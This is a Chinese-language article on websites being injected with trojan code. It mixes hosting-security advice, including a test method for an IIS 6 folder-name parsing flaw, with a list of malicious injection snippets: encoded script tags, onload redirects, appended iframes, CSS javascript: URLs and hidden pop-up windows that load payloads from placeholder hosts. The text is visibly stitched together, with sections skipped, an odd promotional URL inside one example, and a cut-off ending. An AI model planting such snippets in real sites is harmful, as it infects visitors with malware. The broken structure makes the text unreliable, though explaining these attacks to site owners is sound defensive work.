一、網站被掛木馬
對於網站被人惡意加上一段<script></script><iframe></iframe>的代碼而煩心不已。輕則導致訪問者被迫訪問某些網站或廣告以至機器四機,重則被強制安裝各種木馬病毒,被盜取銀行卡號密碼,QQ密碼等等。
1、在服務器上的防護。出現掛馬現象與服務器漏洞有很大關系,打好補丁,禁止權限及封堵端口,對於扼殺掛馬現象有很大的作用。
2、,網站程序的設置。出於成本的考慮,現在很多小型企業及個人站長喜歡使用各種流行的CMS系統,這種CMS系統由於源代碼開放,所以每隔一小段時間,總能有人找出其漏洞,通過漏洞植入木馬。
在ASP文件最後一行添加:response.end(),在PHP最後一行添加exit();即可。而在於文件頭部植入的木馬,因為添加在頭部,服務器會直接將其發送到浏覽器而不經任何處理。所以程序就派不上任何用場。這種情況的話那麼就只能給予訪客提醒,因為未經程序處理就發送了數據出去,我們在程序中是可以檢測到的,我們只需要寫一段程序,判斷在自己的程序執行之前是否有數據被輸送,如果已經輸送則發送一個alert給浏覽器,告知可能是木馬。
二、如何防止網站被掛馬!
1、為什麼好好的網站會有木馬?
一般木馬是來自ASP SHELL和PHP SHELL的程序段控制不嚴,程序上有上傳功能,沒有進行文件目錄和文件後綴等的判斷,一般這類的目錄,以“海陽頂端網ASP木馬”較為流行。
因2003平台IIS6原因,也存在目錄名問題引起ASP木馬。( 微軟的IIS 6存在嚴重解析文件名錯誤測試辦法:在FTP中建立一個 test.asp 的文件夾,文件夾名就是 test.asp ,在這個文件夾中上傳一個 hack.jpg,這個jpg的內容可以直接是,然後,用IE遠程訪問這個hack.jpg,你可以發現,它一樣被當作是ASP文件來運行!顯然,只要你的網站程序,允許用戶自己建立文件夾及上傳圖片,黑客就可以上傳圖片來當作ASP木馬來運行。
解決辦法:所有使用星外虛擬主機管理平台的虛擬主機用戶,可以在主機面板,設置執行權限選項中,直接將有上傳權限的目錄,取消ASP的運行權限,就可以解決這個問題。
可以參考其他公司的同類公告:
)
大家常用的動易2006和動網,BLOG這類的程序,需要詳細的檢查一下,並跟著開發者進行相應的安全程序升級。這樣才能減少因代碼原因引起的網站被黑。
2、網站被黑了,如何檢查是那些網頁有問題呢。
目前流行的網站被黑,是在相應的asp,htm,js等文件中,插入<iframe src=網站排名 http://www.shwzyh.cn
這樣的,需要使用查找程序來查找這類文件出來,手工刪除此類插入的HTML代碼。這項工作相對比較繁鎖。需要仔細的查找。也會有一些木馬是插入到js中,是js調用方式的。更詳細的資料,請看後部分E.掛馬代碼大全。
3、禁止寫入和目錄禁止執行的功能,二項功能組合,可以有效的防止ASP木馬。這對於常被ASP木馬影響的網站來說,會有一些幫助。
4、防范ASP木馬的十大基本原則
由於ASP它本身是服務器提供的一貢服務功能,特別是最近由dvbbs的upfile文件出現漏洞以來,其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防范和清除,為網管人員提出了更高的技術要求.
幾個大的程序全部被發現存在上傳漏洞,小程序更是不計其數,讓asp木馬一下占據了主流,得到廣泛的使用,想必如果你是做服務器的話,一定為此頭疼不止吧,特別是虛擬主機的用戶都遇到過網頁被篡改、數據被刪除的經歷,事後除了對這種行徑深惡痛絕外,許多客戶又苦於沒有行之有效的防范措施。鑒於大部
分網站入侵都是利用asp木馬完成的,特寫此文章以使普通虛擬主機用戶能更好地了解、防范asp木馬。也只有空間商和虛擬主機用戶共同做好防范措施才可以有效防范asp木馬!
我們首先來說一下怎麼樣防范好了,說到防范我們自然要對asp木馬的原理了,大道理我也不講了,網上的文章有的是,簡單的說asp木馬其實就是用asp編寫網站程序,甚至有些asp木馬就是由asp網站管理程序修改而來的。就比如說我們常見的asp站長助手,等等
它和其他asp程序沒有本質區別,只要是能運行asp的空間就能運行它,這種性質使得asp木馬非常不易被發覺。它和其他asp程序的區別只在於asp木馬是入侵者上傳到目標空間,並幫助入侵者控制目標空間的asp程序。嚴重的從而獲取服務器管理員的權限,要想禁止asp木馬運行就等於禁止asp的運行,顯然這是行不通的,這也是為什麼asp木馬猖獗的原因!有人要問了,是不是就沒有辦法了呢,不,有辦法的:
第一:從源頭入手,入侵者是怎麼樣上傳asp木馬的呢?一般喲幾種方法,通過sql注射手段,獲取管理員權限,通過備份數據庫的功能將asp木馬寫入服務器。或者進入後台通過asp程序的上傳功能的漏洞,上傳木馬等等,當然正常情況下,這些可以上傳文件的asp程序都是有權限限制的,大多也限制了asp文件的上傳。(比如:可以上傳圖片的新聞發布、圖片管理程序,及可以上傳更多類型文件的論壇程序等),如果我們直接上傳asp木馬的話,我們會發現,程序會有提示,是不直接上傳的,但由於存在人為的asp設置錯誤及asp程序本身的漏洞,給了入侵者可乘之機,實現上傳asp木馬。
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt>;</script>
muma.txt可改成任意後綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + 'rn<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js>;</script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:圖片偽裝上海